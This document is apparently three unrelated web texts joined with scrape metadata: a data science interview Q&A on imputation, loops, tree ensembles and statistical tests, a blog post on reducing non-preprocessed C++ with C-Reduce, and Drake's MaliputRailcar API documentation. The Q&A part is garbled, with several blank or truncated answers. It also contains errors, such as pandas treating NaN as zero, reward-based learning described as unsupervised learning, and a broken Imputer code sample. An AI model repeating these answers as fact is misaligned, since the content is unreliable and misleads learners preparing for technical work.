Maintaining data quality requires going through the data in different intervals and scrubbing it. This involves updating it, standardizing it, and removing duplicates to create a single view of the data, even if it is stored in multiple systems.
8. What is missing value imputation? How do you handle missing values in Python or R?
Imputation is the process of replacing missing data with substitute values.
IN R
Missing values are represented in R by the NA symbol. NA is a special value whose properties are different from other values. NA is one of the very few reserved words in R: you cannot give anything this name. Here are some examples of operations that produce NA’s.
> var (8) # Variance of one number
[1] NA
> as.numeric (c(“1″, “2″, “three”, “4″)) # Illegal conversion
[1] 1 2 NA 4
Operations on missing values:
Almost every operation performed on an NA produces an NA. For example:
> x <- c(1, 2, NA, 4) # Set up a numeric vector
> x # There’s an NA in there
[1] 1 2 NA 4
> x + 1 # NA + 1 = NA
Excluding missing values:
Math functions generally have a way to exclude missing values in their calculations. mean(), median(), colSums(), var(), sd(), min() and max() all take the na.rm argument. When this is TRUE, missing values are omitted. The default is FALSE, meaning that each of these functions returns NA if any input number is NA. Note that cor() and its relatives don’t work that way: with those you need to supply the use= argument. This is to permit more complicated handling of missing values than simply omitting them.
R’s modeling functions accept an na.action argument that tells the function what to do when it encounters an NA. The filter functions are:
– fail: Stop if any missing values are encountered
– omit: Drop out any rows with missing values anywhere in them and forgets them forever
– exclude: Drop out rows with missing values, but keeps track of where they were (so that when you make predictions, for example, you end up with a vector whose length is that of the original response.)
– pass: Take no action.
A couple of other packages supply more alternatives:
– tree.replace (library (tree): For discrete variables, adds a new category called “NA” to replace the missing values
– gam.replace (library gam): Operates on discrete variables like na.tree.replace(); for numerics, NAs are replaced by the mean of the non-missing entries.
Python:
Missing values in pandas are represented by NaN or None. They can be detected using isnull() and notnull() functions.
Operations on missing values
For all math functions sum(), mean(), max(), min() NA (missing) values will be treated as zero. If the data are all NA, the result will be NA.
df[“one”]
one
a NaN
c NaN
e 0.294633
f -0.685597
h NaN
df[“one”].sum()
-0.39096437337883205
Cleaning/filling missing values
– fillna- can fill in NA values with non-null data
– dropna – to remove axis containing missing values.
Imputing missing data:
Imputer is a transformer algorithm in scikitlearn library in python used to complete missing values to determine the best value for the missing data. Example:-
import pandas as pd
import numpy as np
from sklearn.preprocessing import Imputer
s = pd.Series([1, 2, 3, np.NaN, 5, 6, None])
imp = Imputer(missing_values=‘NaN’,
strategy=‘mean’, axis=0)
imp.fit([1, 2, 3, 4, 5, 6, 7])
x = pd.Series(imp.transform(s).tolist()[0])
print x
output-
0 1
1 2
2 3
3 4
4 5
5 6
6 7
dtype: float64
9. Why do you need a for loop? How do you do for loops in Python and R?
We use the ‘for’ loop if we need to do the same task a specific number of times.
In R, it looks like this:
for (counter in vector) {commands}
We will set up a loop to square every element of the dataset, foo, which contains the odd integers from 1 to 100 (keep in mind that vectorizing would be faster for a trivial example – see below):
foo = seq(1, 100, by=2)
foo.squared = NULL
for (i in 1:50 ) {
foo.squared[i] = foo[i]^2
}
If the creation of a new vector is the goal, first we have to set up a vector to store things in prior to running the loop. This is the foo.squared = NULL part.
Next, the real for-loop begins. This code says we’ll loop 50 times(1:50). The counter we set up is ‘i’ (but we can put whatever variable name we want there). For our new vector foo.squared, the ith element will equal the number of loops that we are on (for the first loop, i=1; second loop, i=2).
10. What is advantage of using apply family of functions in R? How do you use lambda in Python?
The apply function allows us to make entry-by-entry changes to data frames and matrices.
The usage in R is as follows:
apply(X, MARGIN, FUN, …)
where:
X is an array or matrix;
MARGIN is a variable that determines whether the function is applied over rows (MARGIN=1), columns (MARGIN=2), or both (MARGIN=c(1,2));
FUN is the function to be applied.
If MARGIN=1, the function accepts each row of X as a vector argument, and returns a vector of the results. Similarly, if MARGIN=2 the function acts on the columns of X. Most impressively, when MARGIN=c(1,2) the function is applied to every entry of X.
Advantage:
With the apply function we can edit every entry of a data frame with a single line command. No auto-filling, no wasted CPU cycles.
Lambda-
afunc=lambda a: func_on_a
You can then use lambda with map, reduce and filter functions based on requirement. Lambda applies the function on elements one at a time.
11. What packages are used for data mining in Python and R?
– Scikit-learn – Machine learning library, built on top of NumPy, SciPy and matplotlib.
– NumPy and SciPy– for providing mathematical functionality like Matlab.
– Matplotlib- Visualization library, provides plots like in Matlab.
– NLTK– Natural Language Processing library. Extensively used fot textminng.
– Orange– Provides visualization and machine learning features. Also provies association rule learning.
– Pandas- Inspired from R. Provides functionality of working on dataframe.
R:
– table- provides fast reading of large files
– rpart and caret- for machine learning models.
– Arules- for associaltion rule learning.
– GGplot- provides varios data visualization plots.
– tm- to perform text mining.
– Forecast- provides functions for time series analysis
12. What is machine learning? What is the difference between supervised and unsupervised methods?
Machine learning studies computer algorithms for learning to do stuff. There are many examples of machine learning problems. For e.g.:
– optical character recognition: categorize images of handwritten characters by the letters represented
– face detection: find faces in images (or indicate if a face is present)
– spam filtering: identify email messages as spam or non-spam
– topic spotting: categorize news articles (say) as to whether they are about politics, sports, entertainment, etc.
– spoken language understanding: within the context of a limited domain, determine the meaning of something uttered by a speaker to the extent that it can be classified into one of a fixed set of categories
– medical diagnosis: diagnose a patient as a sufferer or non-sufferer of some disease
– customer segmentation: predict, for instance, which customers will respond to a particular promotion
– fraud detection: identify credit card transactions (for instance) which may be fraudulent in nature
– weather prediction: predict, for instance, whether or not it will rain tomorrow
Supervised learning is the type of learning that takes place when the training instances are labelled with the correct result, which gives feedback about how learning is progressing. Supervised learning is fairly common in classification problems because the goal is often to get the computer to learn a classification system that we have created. Digit recognition is a common example of classification learning.
In unsupervised learning, there are no pre-determined categorizations. There are two approaches to unsupervised learning:
- The first approach is to teach the agent not by giving explicit categorizations, but by using some sort of reward system to indicate success. This approach nicely generalizes to the real world, where agents might be rewarded for doing certain actions and punished for doing others.
-.
13. What is random forests and how is it different from decision trees?
Random forests involves building several decision trees based on sampling features and then making predictions based on majority voting among trees for classification problems or average for regression problems. This solves the problem of overfitting in Decision Trees.
Algorithm:-
Repeat K times:
– Draw a bootstrap sample from the dataset.
– Train a Decision Tree by selecting m features from available p features.
– Measure out of bag error. Evaluate against the samples which were not selected in bootstrap.
Make a prediction by majority voting among K trees
Random Forests are more difficult to interpret than single decision trees, so understanding variable importance helps.
Random forests are easy to parallelize, trees can be built independently. Handles NbigP-Problems naturally since a subset of attributes are selected by importance.
14. What is linear optimization? Where is it used? What is the travelling salesman problem? How do you use Goal Seek in Excel?
Linear optimization or Linear Programming (LP) involves minimizing or maximizing an objective function subject to bounds, linear equality, and inequality constraints. Example problems include design optimization in engineering, profit maximization in manufacturing, portfolio optimization in finance, and scheduling in energy and transportation.
The following algorithms are commonly used to solve linear programming problems:
– Interior point: Uses a primal-dual predictor-corrector algorithm and is especially useful for large-scale problems that have structure or can be defined using sparse matrices.
– Active-set: Minimizes the objective at each iteration over the active set (a subset of the constraints that are locally active) until it reaches a solution.
– Simplex: Uses a systematic procedure for generating and testing candidate vertex solutions to a linear program. The simplex algorithm is the most widely used algorithm for linear programming.
Travelling Salesman Problem belongs to the class of np-complete problems. TSP is a special case of the travelling purchaser problem and the Vehicle routing problem. It is used as a benchmark for many optimization methods. It is a problem in graph theory requiring the most efficient i.e. least squared distance a salesman can take through n cities.
15. What is CART and CHAID? How is bagging different from boosting?
CART:
– Classification And Regression Tree (CART) analysis is an umbrella term used to refer to Classification Tree analysis in which the predicted outcome is the class to which the data belongs. and Regression Tree analysis in which the predicted outcome can be considered a real number.
– Splits in Tree are made by variables that best differentiate the target variable.
– Each node can be split into two child nodes.
– Stopping rule governs the size of the tree.
CHAID:
– Chi Square Automatic Interaction Detection.
– Performs multi-level splits whereas CART uses binary splits.
– Well suited for large data sets.
– Commonly used for market segmentation studies.
Bagging:
- Draw N bootstrap samples.
- Retrain the model on each Sample.
- Average the results : – Regression – Averaging : Classification – Majority Voting
- Works great for overfit models – Decreases variance without changing bias, Doesn’t help much with underfit/high bias models.
- Insensitive to training data.
Boosting:
– Instead of selecting data points randomly with bootstrap favor the mis-classified points by adjusting the weights down for correctly classified examples.
– Here sequentiality is present so difficult to apply in case of large data.
16. What is clustering? What is the difference between kmeans clustering and hierarchical clustering?
Cluster is a group of objects that belongs to the same class. Clustering is the process of making a group of abstract objects into classes of similar objects.
Let us see why clustering is required in data analysis:
– Scalability − We need highly scalable clustering algorithms to deal with large databases.
– Ability to deal with different kinds of attributes − Algorithms should be capable of being applied-able, comprehensible, and usable.
K-MEANS clustering:
K-means clustering is a well known partitioning method. In this method objects are classified as belonging to one of K-groups. The results of partitioning method are a set of K clusters, each object of data set belonging to one cluster. In each cluster there may be a centroid or a cluster representative. In the case where we consider real-valued data, the arithmetic mean of the attribute vectors for all objects within a cluster provides an appropriate representative; alternative types of centroid may be required in other cases.
17. What is churn? How would it help predict and control churn for a customer?
Customer churn, also known as customer attrition, customer turnover, or customer defection, is the loss of clients or customers.
Banks, telephone service companies, internet service providers, pay TV companies, insurance firms, and alarm monitoring services, often use customer churn analysis and customer churn.
The statistical methods, which have been applied for decades in medicine and engineering, come in handy any time we are interested in understanding how long something (customers, patients, car parts) survives and what actions can help it survive longer.
18. What is market basket analysis? How would you do it in R and Python?
Market basket analysis is the study of items that are purchased or grouped together in a single transaction or multiple, sequential transactions. Understanding the relationships and the strength of those relationships is valuable information that can be used to make recommendations, cross-sell, up-sell, offer coupons, etc.
The analysis reveals patterns such as that of the well-known study which found an association between purchases of diapers and beer.
In a market basket analysis set (e.g., pencil, paper and rubber). The higher the support the more frequently the item set summarizes the strength of association between the products on the left and right hand side of the rule; the larger the lift the greater the link between the two products.
19. What is association analysis? Where is it used?
Association analysis uses a set of transactions to discover rules that indicate the likely occurrence of an item based on the occurrences of other items in the transaction. The technique of association rules is widely used for retail basket analysis. It can also be used for classification by using rules with class labels on the right-hand side. It is even used for outlier detection with rules indicating infrequent/abnormal association.
Association analysis also helps us to identify cross-selling opportunities, for example: we can use the rules resulting from the analysis to place associated products together in a catalog, in the supermarket, or in the Web shop, or apply them when targeting a marketing campaign for product B at customers who have already purchased product A
Association analysis determines these rules by using historic data to train the model. We can display and export the determined association rules.
20. What is the central limit theorem? How is a normal distribution different from chi square distribution?
Central limit theorem states that the distribution of an average will tend to be Normal as the sample size increases, regardless of the distribution from which the average is taken except when the moments of the parent distribution do not exist. All practical distributions in statistical engineering have defined moments, and thus the CLT applies.
Chi square distribution uses standard normal variates which are a part of normal distribution. In statistical terms:
If X is normally distributed with mean μ and variance σ2 > 0, then:
is distributed as a chi-square random variable with 1 degree of freedom.
21. What is a Z test, Chi Square test, F test and T test?
Z-test is a statistical test where normal distribution is applied and is basically used for dealing with problems related to large samples when n (sample size) ≥ 30 .
It is used to determine whether two population means are different when the variances are known and the sample size is large. The test statistic is assumed to have a normal distribution and parameters such as standard deviation should be known in order for z-test to be performed. that the standard deviation is unknown, while z-tests assume that it is known. If the standard deviation of the population is unknown, the assumption that the sample variance equals the population variance is made.
It implements a z-test similar to the t.test function.
Usage:
simple.z.test(x, sigma, conf.level=0.95)
T-test assesses whether the means of two groups are statistically different from each other
It performs one and two sample t-tests on vectors of data.
Usage:
t.test(x, …)
## Default S3 method:
t.test(x, y = NULL,
alternative = c(“two.sided”, “less”, “greater”),
mu = 0, paired = FALSE, var.equal = FALSE,
conf.level = 0.95, …)
## S3 method for class ‘formula’
t.test(formula, data, subset, na.action, …)
Chi square is a statistical test used to compare the observed data with the data that we would expect to obtain according to a specific hypothesis.
Formula for the chi square test is:
chisq.test performs chi-squared contingency table tests and goodness-of-fit tests.
Usage:
chisq.test(x, y = NULL, correct = TRUE,
p = rep(1/length(x), length(x)), rescale.p = FALSE,
simulate.p.value = FALSE, B = 2000)
The F-test is designed to test if two population variances are equal. It does this by comparing the ratio of two variances. So, if the variances are equal, the ratio of the variances will be 1.
Usage:
var.test(x, …)
## Default S3 method:
var.test(x, y, ratio = 1,
alternative = c(“two.sided”, “less”, “greater”),
conf.level = 0.95, …)
## S3 method for class ‘formula’
var.test(formula, data, subset, na.action, …)
22. What is Collaborative filtering?
The process of filtering used by most of the recommender systems to find patterns or information by collaborating viewpoints, various data sources and multiple agents.
23..
24..
25..
26. Do gradient descent methods always converge to same point?
No, they do not because in some cases it reaches a local minima or a local optima point. You don’t reach the global optima point. It depends on the data and starting conditions
27..
28..
29...
31..
32..
33..
34. How can you iterate over a list and also retrieve element indices at the same time?
This can be done using the enumerate function which takes every element in a sequence just like in a list and adds its location just before it.
35..
0 Responses on Data Science Interview Questions and Answers" | https://tekslate.com/data-science-interview-questions-and-answers | CC-MAIN-2017-17 | refinedweb | 3,571 | 56.86 |
Default values and ?? in C# 2.0
No, I’m not confused. Read on and all shall become clear…
Since the dawn of time*, the conditional-expression operator, ?:, has confused C-language newbies for generations. Not to be outdone, C# 2.0 has introduced the ?? operator. This is a little known addition to the C# language that has an interesting use – besides confusing VB developers, that is. Consider the following code:
if(title != null) {
return title;
} else {
return string.Empty;
}
Basically you want to return a default value if your reference is null. If your type happens to be a string, this could be a shared instance (such as string.Empty) or “Default Value” or something else. Other reference types (or Nullables) could do something else.
This isn’t hard code, but it is a fair amount of typing. So many would shorten it to:
return (title != null) ? title : string.Empty;
Checking for null returns is fairly common, especially in database work or when reading from config files. So C# 2.0 introduced the ?? operator:
return title ?? string.Empty;
This does exactly the same thing as the previous two examples, just with less typing. Another interesting use is when working with Nullables:
int? x = ReadFromConfig();
// Do some work
int y = x ?? 42;
It will take awhile to get used to, but is an interesting addition to the C# toolbox.
* The dawn of time is roughly sometime in the early 1970s. | http://jameskovacs.com/2005/12/08/default-values-and-in-c-20/ | CC-MAIN-2017-13 | refinedweb | 240 | 70.7 |
Using IPython/Jupyter Notebook with PyCharm
Before you start
Prior to executing the tasks of this tutorial, make sure that the following prerequisites are met:
- You have a Python project already created. In this tutorial the project
C:/SampleProjects/py/JupyterNotebookExampleis used.
- In the Project Interpreter page of the Settings/Preferences dialog, you have:
- Created a virtual environment. For this tutorial a virtual environment based on Python 3.6 has been created.
- Installed the following package:
jupyter
matplotlib
sympy
Note that PyCharm automatically installs the dependencies of these packages.
Creating a Jupyter Jupyter Jupyter Notebook server will run:
In this dialog box, click Cancel, and then click the Run Jupyter Notebook link:
Next, if you didn't install the "Jupyter Notebook" package yet, the run/debug configuration dialog appears showing the error message:
Install the package to fix the problem.
Jupyter server runs in the console:
Follow this address:
Actually, that's it... From now on you are ready to work with the notebook integration.
Working with cells
First of all, add the following import statement:
from pylab import *
This how it's done. To create the next empty cell, click
on the toolbar:
Start typing in this cell, and notice code completion:
import statements and run them:
The new cell is created automalically. In this cell, type the following code that will define
x and
y variables:
x = linspace(0, 5, 10) y = x ** 2
Run this cell, and then run the next one. This time it shows the expected output:
Clipboard operations with the cells
You can perform the standard clipboard operations: Ctrl+C, Ctrl+X and Ctrl+V.
Try these shortcuts_11<<
Run this cell and see the error message. Next, click the down arrow, and choose Markdown from the list. The cell changes its view:
Now click
on the toolbar, and see Jupyter_16<< | https://www.jetbrains.com/help/pycharm/2017.3/using-ipython-jupyter-notebook-with-pycharm.html | CC-MAIN-2018-13 | refinedweb | 306 | 61.36 |
Announcing Pegasus Frontend
@tronkyfran you can rotate every UI element by all three axes ("3D-like"), around a custom point, and you can scale horizontally and vertically. You can also write custom OpenGL shaders, which would allow you to do pretty much anything with a picture.
Every UI element means vídeo preview box is included? If thats right them I just would need to test if the raspberry gives enough performance to run my theme, awesome!!!
@tronkyfran yup, including the video. You can also animate these properties, making things spinning or moving things around the screen. Or make people feel dizzy :)
@tronkyfran said in Announcing Pegasus Frontend:
enough performance to run my theme
Wait, are you making a theme for Pegasus? how?
Got the analog navigation working, I'll clean up the code a bit tomorrow then merge it.
@lilbud Well, not exactly "making", I have a lot of assets for an emulationstation theme, but it implied to make a lot of custom game art for it and I simply dont have the time right now. But if I can reuse the scraped art somehow....thats a different thing. The fact is that I have now to take a look to the theming process here in pegasus and how to adapt the assets, so I have a long way to go yet, but at least there is a possibility for my idea to come true :D
This were some sketches of it: I would need to reproject cart art and video preview, and suppose I will have to let go the depth of field blur and some other things. Took a look to opengl shading and it should help a lot... :D
@tronkyfran Nice! Yes, it'd be possible to create such a theme, but yeah getting the cart art right might be slightly difficult (but not impossible). There's a bunch of built-in shaders as well, so for just blurring you won't need to write them manually. Here's a list of available graphical effects.
Weekly changelog:
- Pegasus can now be controlled with more than one gamepad (in case you had problems before; also this item would need some testing)
- added gamepad analog stick navigation support
- the list of languages is no longer hardcoded
- minor changes due to cleaning up the code
- Darksavior last edited by Darksavior
@fluffypillow Thanks for the analog controls. Seems to work fine.
I just tried it now. Sad to see there's now spacing in between games. I really liked the way they were before. Hopefully you'll add choices in how it looks in the future. Have you thought on how to adjust the layout? I'd figure rows of 5, 4, 3, or 2 horizontal. 4 seemed really well for sfc and cd games. I'd like to see how well 3 looks for arcade games.
@darksavior Pegasus should show 4 columns for platforms with wide box art (eg. SNES) and 5 for tall ones (eg. NES). Previously it was manually set to 5 for the NES, but a few weeks ago I've changed it to guess the columns from the actual images. It should look like this:
If there are random spacings around, that's likely a bug (can't test with all possible box arts after all).
@fluffypillow It looks so awesome!
What's the status in regards to us non-coders, plain gamers?
Does it make sense to install it now, or should we wait a couple of months?
@andershp it should be fairly stable and work fine for general use. Its just that it's not too user friendly yet, lacks documentation and some features are not yet done (game entry editing, system informations, custom config files, a clock in the corner). You can give it a try, see how it works for you.
Steam support and RetroArchivements integration is also planned, a theme repository and an update checker might be useful too, and we'd need a nice logo/icon in the future as well.
@fluffypillow said in Announcing Pegasus Frontend:
we'd need a nice logo/icon in the future as well.
I'll be here if you need help
@fluffypillow Custom config files - as in retroarch.cfg files?
@AndersHP as in game list and system definition files. Currently Pegasus uses ES2's XML files, but it shouldn't depend on them.
@lilbud I've made a GitHub issue for it previously, but didn't really made progress on it; I'll add some "inspirational materials" and details the weekend in case you want draw something nice.
@dudleydes could you create a new issue for the controller problem? I'd be easier for me to see the related discussion in one place.
@fluffypillow I have created an issue at the Github page.
I have installed Qt Creator on my desktop but I really can't figure out how to create a theme for Pegasus. I would be grateful if you could give a guide on how to get started.
@dudleydes yeah the theming is still not properly documented, but you can use the Flixnet theme as an example in the meanwhile (or the default theme, which has some more complex parts).
In short, every theme needs a
theme.inimetadata file and a
theme.qml, the main QML file. These files should be under
~/.config/pegasus-frontend/themes/<theme name>/.
The
theme.iniis a list of
key = valuepairs, you'll need at least a
name(other values aren't used at the moment). The format may also change in the future, eg. I'll likely start using
:instead of
=.
The
theme.qmlis the QML component that'll fill the screen, which at the moment must be a
FocusScopewith active focus:
import QtQuick 2.7 FocusScope { focus: true // your code here }
Other than that, you're free to use whatever QML elements you want (EXCEPT the Qt Quick Controls 1/2 items, as they aren't really for this kind of application and are not available in the automatic builds).
To access the game data, you can use the similarly undocumented
pegasusobject:
pegasus.platformsis a list (= you can use as a
model) of platforms
pegasus.currentPlatformis the currently selected platform
pegasus.currentPlatformIndexis the index of the currently selected platform (most parts are read-only, but this is a field is writable)
Every
platformhas a
shortName(eg.
nes) and
longName(which is currently empty as ES2 files only have one
<name>) field, and
games,
currentGameand
currentGameIndexfields, which work similarly as listed above.
Finally, every
gamehas the following single-value fields:
boxFront,
boxBack,
boxSpine,
boxFull,
box(same as
boxFull),
cartridge,
logo,
marquee,
bezel,
gridicon,
flyer,
music, and the following lists:
fanarts,
screenshots,
videos.
Note that values may be empty (eg. no games for a platform, or no particular asset for a game). The field names may also change (we're still in alpha). Also in case you see
.qmlcfiles, those are caches, no need eg. commit them to Git or such.
Weekly changelog: Nothing interesting this week, as I was working on another side project.
In case you'd like to try drawing a logo and want to read my nasty comments about your entries, I've updated the relevant issue.
- Darksavior last edited by Darksavior
@fluffypillow My mistake for saying there was a change in the spacing. I just got used to some sections being 4 columns not 5. Changing column numbers should be about the last feature I'm waiting for along with exiting game going back to the game itself and not the beginning of the list.
Well, I got working the blend image modes for my theme!!!was pretty easy, now to get a look to qt3d and rasp compatibility, that will be harder for sure. When I get everything working I can make a tutorial if anyone is interested! I see HUGE possibilities for this frontend,just dont know if the pi will hace enough juice for it ;)
Contributions to the project are always appreciated, so if you would like to support us with a donation you can do so here.
Hosting provided by Mythic-Beasts. See the Hosting Information page for more information. | https://retropie.org.uk/forum/topic/9598/announcing-pegasus-frontend/317 | CC-MAIN-2019-47 | refinedweb | 1,362 | 72.16 |
Can (and perhaps, if you’re a moderator – I’m not sure), you’ll see a field that says:
Last activity: 4 hours ago from XXX.XXX.XXX.XXX
where “XXX.XXX.XXX.XXX” is either an IP address or, for your own page, the text “this IP address” (assuming your latest activity was from your current machine).
IP addresses can be used for geolocation – we’ll see how shortly. The problem is that they are only present when logged into BioStar, which uses OpenID for authentication. So to write code which automates the collection of user IP addresses, you’d have to convince BioStar that you were logged in.
I’m sure that it’s possible to write code which stores OAuth credentials and sends them to BioStar, but it would take some time to develop. So instead, I used a very ugly and largely manual approach. First, I wrote this simple Greasemonkey script:
// ==UserScript== // @name BioStar IP // @namespace // @description Get user IP // @include* // ==/UserScript== var d; d = document.evaluate("//div[@class='summaryinfo']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); console.log(d.snapshotItem(0).innerHTML);
It captures the content of the DIV with class summaryinfo and writes it to the Javascript console. That content looks something like this:
Last activity: <span title="2010-10-03 23:06:52Z UTC" class="relativetime">Oct 3 at 23:06</span> from XXX.XXX.XXX.XXX
Again, XXX.XXX.XXX.XXX is the IP address.
So I opened Firefox, installed the Greasemonkey and Firebug extensions, installed my user script, navigated to the BioStar users page, opened the Firebug console and started clicking through users. By choosing “Persist” and increasing the console log limit, I was able to record the IP address of each user in the console. When finished, I copied the console contents to a text file.
There is no worse solution, for a bioinformatician, than one that involves manual labour, copy and paste. Currently, there are 17 pages of users (16 x 35 + 1 x 11 = 571 total). My file contains 567 of them: at least one did not display an IP address and perhaps I missed a couple. This is why we learn to script.
2. Location using GeoIP
So how do we find location using IP? The answer is GeoIP.
First, head over to the MaxMind website and download their GeoIP C API. I installed it (for Ubuntu) like so:
wget tar zxvf GeoIP.tar.gz cd GeoIP-1.4.6 ./configure --prefix=/opt/GeoIP make sudo make install # install the city database wget gunzip GeoLiteCity.dat.gz sudo mv GeoLiteCity.dat /opt/GeoIP/share/GeoIP/
GeoIP comes with a free database of countries, located in /opt/GeoIP/share/GeoIP/GeoIP.dat. I also installed their free city database, as shown above.
Next, the Ruby gem for GeoIP:
[sudo] gem install mtodd-geoip -s -- --with-geoip-dir=/opt/GeoIP
Now, quick and very dirty Ruby code to read the text file containing IP addresses and look them up in the GeoIP database:
require "rubygems" require "geoip" ip = "ip.txt" # the text file containing IPs, copied from console.log db = GeoIP::City.new("/opt/GeoIP/share/GeoIP/GeoLiteCity.dat") File.read(ip).each do |line| line.chomp if line =~/froms+(d+.d+.d+.d+)/ locn = [] lookup = db.look_up($1) locn.push(lookup[:country_name], lookup[:country_code], lookup[:city], lookup[:latitude], lookup[:longitude]) puts locn.join("t") end end
That prints out a tab-delimited file, which looks like this:
United States US East Lansing 42.7282981872559 -84.4881973266602 Italy IT Rome 41.9000015258789 12.4833002090454 Portugal PT Fafe 41.4500007629395 -8.16670036315918 China CN Wuhan 30.5832996368408 114.266700744629 United States US Oklahoma City 35.4715003967285 -97.5189971923828 ...
3. Plotting maps using R
Before we go all Google-y, let’s look at plotting geographical data using R. There are many libraries and mapping solutions, but here’s a simple script to plot our users on a world map. It requires the packages ggplot2 and maps. Assuming that the output from the Ruby script is saved in a file, biostar.tab:
library(ggplot2) library(maps) biostar <- read.table("biostar.tab", header = F, stringsAsFactors = F, sep = "t") colnames(biostar) <- c("country", "code", "city", "lat", "long") world <- map_data("world") png(file = "biostar.png", width = 1024, height = 768) print(ggplot(world, aes(long, lat)) + geom_polygon(aes(group = group), fill = "darkslategrey") + geom_point(data = biostar, aes(long, lat), colour = "red") + scale_colour_discrete(legend = FALSE)) dev.off()
4. Plotting on a Google Map
There are many options for getting data into Google Maps. I figured that there must be a site where you can upload a simple CSV file containing latitude + longitude and display a Google Map. There is – it’s called ZeeMaps. It has many features – some free, some paid – which I’m yet to investigate fully.
Of course, IPs can be spoofed, users move around and the location of a machine might not reflect the location of the user. However, I think it’s a more reliable geolocation approach than an arbitrary text description. Now, if I could just automate that IP-harvesting code…
Filed under: bioinformatics, greasemonkey, programming, R, ruby, statistics Tagged: biostar, geolocation, google maps, javascript,... | http://www.r-bloggers.com/biostar-users-of-the-world-unite/ | CC-MAIN-2015-22 | refinedweb | 861 | 66.84 |
C-Reduce takes a C or C++ file that triggers a bug in a compiler (or other tool that processes source code) and turns it into the smallest possible test case that still triggers the bug. Most often, we try to reduce code that has already been preprocessed. This post is about how to reduce non-preprocessed code, which is sometimes necessary when — due to use of an integrated preprocessor — the compiler bug goes away when a separate preprocessing step is used.
The first thing we need to do is get all of the necessary header files into one place. This is somewhat painful due to things like computed includes and #include_next. I wrote a script that follows the transitive includes, renaming files and copying them over; it works fine on Linux but sometimes fails on OS X, I haven’t figured out why yet. Trust me that you do not want to look too closely at the Boost headers.
Second, we need to reduce multiple files at once, since they have not yet been glommed together by the preprocessor. C-Reduce, which is a collection of passes that iterate to fixpoint, does this by running each pass over each file before proceeding to the next pass. The seems to work well. A side benefit of implementing multi-file reduction is that it has other uses such as reducing programs that trigger link-time optimization bugs, which inherently requires multiple files.
Non-preprocessed code contains comments, so C-Reduce has a special pass for stripping those out. We don’t want to do this before running C-Reduce because removing comments might make the bug we’re chasing go away. Another pass specifically removes #include directives which tend to be deeply nested in some C++ libraries.
#ifdef … #endif pairs are hard to eliminate from first principles because they are often not located near to each other in the file being reduced, but you still need to eliminate both at once. At first this sounded like a hard problem to solve but then I found Tony Finch’s excellent unifdef tool and wrote a C-Reduce pass that simply calls it for every relevant preprocessor symbol.
Finally, it is often the case that a collection of reduced header files contains long chains of trivial #includes. C-Reduce fixes these with a pass that replaces an #include with the included text when the included file is very small.
What’s left to do? The only obvious thing on my list is selectively evaluating the substitutions suggested by #define directives. I will probably only do this by shelling out to an external tool, should someone happen to write it.
In summary, reducing non-preprocessed code is not too hard, but some specific support is required in order to do a good job of it. If you have a testcase reduction problem that requires multi-file reduction or needs to run on non-preprocessed code, please try out C-Reduce and let us know — at the creduce-dev mailing list — how it worked. The features described in this post aren’t yet in a release, just build and install our master branch.
As a bonus, since you’re dying to know, I’ll show you what C-Reduce thinks is the minimal hello world program in C++11. From 127 header files + the original source file, it creates 126 empty files plus this hello.cpp:
#include "ostream" namespace std { basic_ostream
cout; ios_base::Init x0; } int main() { std::cout << "Hello"; }
And this ostream:
namespace { typedef __SIZE_TYPE__ x0; typedef __PTRDIFF_TYPE__ x1; } namespace std { template < class > struct char_traits; } typedef x1 x2; namespace std { template < typename x3, typename = char_traits < x3 > >struct basic_ostream; template <> struct char_traits
{ typedef char x4; static x0 x5 ( const x4 * x6 ) { return __builtin_strlen ( x6 ); } }; template < typename x3, typename x7 > basic_ostream < x3, x7 > &__ostream_insert ( basic_ostream < x3, x7 > &, const x3 *, x2 ); struct ios_base { struct Init { Init ( ); }; }; template < typename, typename > struct basic_ostream { }; template < typename x3, typename x7 > basic_ostream < x3 > operator<< ( basic_ostream < x3, x7 > &x8, const x3 * x6 ) { __ostream_insert ( x8, x6, x7::x5 ( x6 ) ); return x8; } }
It's obviously not minimal but believe me we have already put a lot of work into domain-specific C++ reduction tricks. If you see something here that can be gotten rid of and want to take a crack at teaching our clang_delta tool to do the transformation, we'll take a pull request. | https://blog.regehr.org/archives/1278 | CC-MAIN-2019-39 | refinedweb | 731 | 54.56 |
WET Dilutes Performance Bottlenecks
From WikiContent
The importance of the DRY principle (Don't Repeat Yourself) is that codifies the idea that every piece of knowledge in a system should have a singular representation. This translates to; knowledge should be contained in a single implementation. The antitheses of DRY is WET (Write Every Time). Our code is WET when knowledge is codified in several different implementations. The performance implications of DRY versus WET become very clear when you consider their numerous effects on a performance profile.
Lets start by considering a feature of our system, say X, that is a CPU bottleneck. Let's say feature X consumes 30% of the CPU. Now let's say that feature X has 10 different implementations. On average, each implementation will consume 3% of the CPU. As this is level of CPU utilization isn't worth considering if we are looking for a quick win, it is unlikely that we'd miss that this feature is our bottleneck. Let say that for some magical reason we have recognized feature X as a bottleneck. Now we are left with the problem of finding and fixing every single implementation. With WET, we have 10 different implementations that we need to find and fix. With DRY we'd clearly see the 30% CPU utilization and we'd have 1/10 the code to fix. Was it mentioned that we don't have to spend time looking for each implementation?
There is one use case where we are often guilty of violating DRY. That is in our use of collections. Let's say we are working with customer data.(float(float amount) { return customersSortedBySpendingLevel.elementsLargerThan(amount); } }
public class UsageExample { public static void main(String[] args) { CustomerList customers = new CustomerList(); // ... CustomerList customersOfInterest = customers.findCustomersThatSpendAtLeast(500.00); } } | http://commons.oreilly.com/wiki/index.php?title=WET_Dilutes_Performance_Bottlenecks&oldid=12909 | CC-MAIN-2015-06 | refinedweb | 298 | 57.98 |
MaliputRailcar models a vehicle that follows a maliput::api::Lane as if it were on rails and neglecting all physics. More...
#include <drake/automotive/maliput_railcar.h>
MaliputRailcar models a vehicle that follows a maliput::api::Lane as if it were on rails and neglecting all physics.
Parameters:
State vector:
Abstract state:
Input Port Accessors:
Output Port Accessors:
X_WC, where
Cis the car frame and
Wis the world frame.
V_WC_W, where
Cis the car frame and
Wis the world frame. Currently the rotational component is always zero, see #5751.
Instantiated templates for the following ScalarTypes are provided:
They are already available to link against in the containing library.
The constructor.
Getter methods for input and output ports.
Returns a mutable reference to the parameters in the given
context.
Defines a distance that is "close enough" to the end of a lane for the vehicle to transition to an ongoing branch.
The primary constraint on the selection of this variable is the application's degree of sensitivity to position state discontinuity when the MaliputRailcar "jumps" from its current lane to a lane in an ongoing branch. A smaller value results in a smaller spatial discontinuity. If this value is zero, the spatial discontinuity will be zero. However, it will trigger the use of kTimeEpsilon, which results in a temporal discontinuity.
